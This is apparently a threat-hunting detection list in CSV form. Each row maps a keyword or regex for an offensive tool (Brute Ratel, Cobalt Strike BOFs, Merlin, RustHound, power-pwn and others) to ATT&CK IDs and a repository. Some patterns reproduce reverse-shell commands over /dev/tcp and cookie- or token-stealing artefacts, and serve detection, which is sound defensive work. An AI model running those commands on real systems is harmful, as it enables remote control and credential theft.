"*runShellcode*",".{0,1000}runShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*runshellcode.asm*",".{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*runshellcode.exe*",".{0,1000}runshellcode\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - 
T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*runshellcode.o*",".{0,1000}runshellcode\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealCookie\-8B5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealPowerAutomateToken\-8C5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* 
/bin/bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/sh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\sbash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* cmd""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\scmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* powershell""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spowershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - 
T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* pwsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* zsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\szsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Runtime.getRuntime().exec(""bash -c* /dev/tcp/*/*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c.{0,1000}\s\/dev\/tcp\/.{0,1000}\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RuralBishop.csproj*",".{0,1000}RuralBishop\.csproj.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" 
"*RuralBishop.exe*",".{0,1000}RuralBishop\.exe.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*RuralBishop.sln*",".{0,1000}RuralBishop\.sln.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*RuralBishop-master*",".{0,1000}RuralBishop\-master.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","102","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*russel.vantuyl@gmail.com*",".{0,1000}russel\.vantuyl\@gmail\.com.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access 
Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rustbof.cna*",".{0,1000}rustbof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*rustcat-3.0.0.zip*",".{0,1000}rustcat\-3\.0\.0\.zip.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rusthound * --zip --ldaps --adcs 
--old-bloodhound*",".{0,1000}rusthound\s.{0,1000}\s\-\-zip\s\-\-ldaps\s\-\-adcs\s\-\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rusthound *--domain*",".{0,1000}rusthound\s.{0,1000}\-\-domain.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound *--ldapfqdn *",".{0,1000}rusthound\s.{0,1000}\-\-ldapfqdn\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound *-ldaps *",".{0,1000}rusthound\s.{0,1000}\-ldaps\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound -c *",".{0,1000}rusthound\s\-c\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD 
Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound -d *",".{0,1000}rusthound\s\-d\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound rusthound linux*",".{0,1000}rusthound\srusthound\slinux.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound rusthound windows*",".{0,1000}rusthound\srusthound\swindows.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound* --adcs --dc-only*",".{0,1000}rusthound.{0,1000}\s\-\-adcs\s\-\-dc\-only.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rusthound.exe*",".{0,1000}rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD 
Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*RustHound-main*",".{0,1000}RustHound\-main.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*rvazarkar/GMSAPasswordReader*",".{0,1000}rvazarkar\/GMSAPasswordReader.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*Rvn0xsy/Cooolis-ms*",".{0,1000}Rvn0xsy\/Cooolis\-ms.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*rvrsh3ll/BOF_Collection*",".{0,1000}rvrsh3ll\/BOF_Collection.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*rvrsh3ll/TokenTactics*",".{0,1000}rvrsh3ll\/TokenTactics.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*",".{0,1000}RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" 
"*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*",".{0,1000}RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*rwxfinder.*",".{0,1000}rwxfinder\..{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*RWXfinder-main*",".{0,1000}RWXfinder\-main.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through 
directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","93","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*RXh0ZXJuYWwgQzIgUG9ydA==*",".{0,1000}RXh0ZXJuYWwgQzIgUG9ydA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*rxwx/cs-rdll-ipc-example*",".{0,1000}rxwx\/cs\-rdll\-ipc\-example.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*RythmStick/AMSITrigger*",".{0,1000}RythmStick\/AMSITrigger.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*'S', 'T', 'A', 'R', 'D', 'U', 'S', 'T', '-', 'E', 'N', 'D'*",".{0,1000}\'S\',\s\'T\',\s\'A\',\s\'R\',\s\'D\',\s\'U\',\s\'S\',\s\'T\',\s\'\-\',\s\'E\',\s\'N\',\s\'D\'.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" 